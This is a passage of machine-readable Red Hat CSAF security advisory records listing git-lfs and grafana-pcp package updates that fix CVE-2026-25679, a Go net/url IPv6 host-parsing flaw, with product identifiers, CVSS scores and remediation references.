"https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-21T17:19:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.src", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9434"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.src", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.src", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9434"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana-pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support and Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9094", "url": "https://access.redhat.com/errata/RHSA-2026:9094"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9094.json"}], "title": "Red Hat Security Advisory: grafana-pcp security update", "tracking": {"current_release_date": "2026-06-08T15:52:50+00:00", "generator": {"date": "2026-06-08T15:52:50+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9094", "initial_release_date": "2026-04-20T18:16:32+00:00", "revision_history": [{"date": "2026-04-20T18:16:32+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T18:16:32+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:50+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product": {"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_aus:8.4::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.0.2-4.el8_4.src", "product": {"name": "grafana-pcp-0:3.0.2-4.el8_4.src", "product_id": "grafana-pcp-0:3.0.2-4.el8_4.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.0.2-4.el8_4?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.0.2-4.el8_4.x86_64", "product": {"name": "grafana-pcp-0:3.0.2-4.el8_4.x86_64", "product_id": "grafana-pcp-0:3.0.2-4.el8_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.0.2-4.el8_4?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "product": {"name": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "product_id": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.0.2-4.el8_4?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.0.2-4.el8_4.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.src"}, "product_reference": "grafana-pcp-0:3.0.2-4.el8_4.src", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.0.2-4.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.x86_64"}, "product_reference": "grafana-pcp-0:3.0.2-4.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.0.2-4.el8_4.src as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.src"}, "product_reference": "grafana-pcp-0:3.0.2-4.el8_4.src", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.0.2-4.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.x86_64"}, "product_reference": "grafana-pcp-0:3.0.2-4.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T18:16:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9094"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-0:3.0.2-4.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-pcp-debuginfo-0:3.0.2-4.el8_4.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9094"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana-pcp is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9093", "url": "https://access.redhat.com/errata/RHSA-2026:9093"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9093.json"}], "title": "Red Hat Security Advisory: grafana-pcp security update", "tracking": {"current_release_date": "2026-06-08T15:52:50+00:00", "generator": {"date": "2026-06-08T15:52:50+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9093", "initial_release_date": "2026-04-20T18:01:22+00:00", "revision_history": [{"date": "2026-04-20T18:01:22+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T18:01:22+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:50+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_aus:8.6::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:8.6::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_tus:8.6::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-4.el8_6.src", "product": {"name": "grafana-pcp-0:3.2.0-4.el8_6.src", "product_id": "grafana-pcp-0:3.2.0-4.el8_6.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-4.el8_6?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "product": {"name": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "product_id": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-4.el8_6?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "product_id": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-4.el8_6?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-4.el8_6.aarch64", "product": {"name": "grafana-pcp-0:3.2.0-4.el8_6.aarch64", "product_id": "grafana-pcp-0:3.2.0-4.el8_6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-4.el8_6?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "product_id": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-4.el8_6?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "product": {"name": "grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "product_id": "grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-4.el8_6?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "product_id": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-4.el8_6?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-4.el8_6.s390x", "product": {"name": "grafana-pcp-0:3.2.0-4.el8_6.s390x", "product_id": "grafana-pcp-0:3.2.0-4.el8_6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-4.el8_6?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "product_id": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-4.el8_6?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.src"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.aarch64"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.aarch64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.ppc64le"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.s390x"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.s390x", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.src"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": 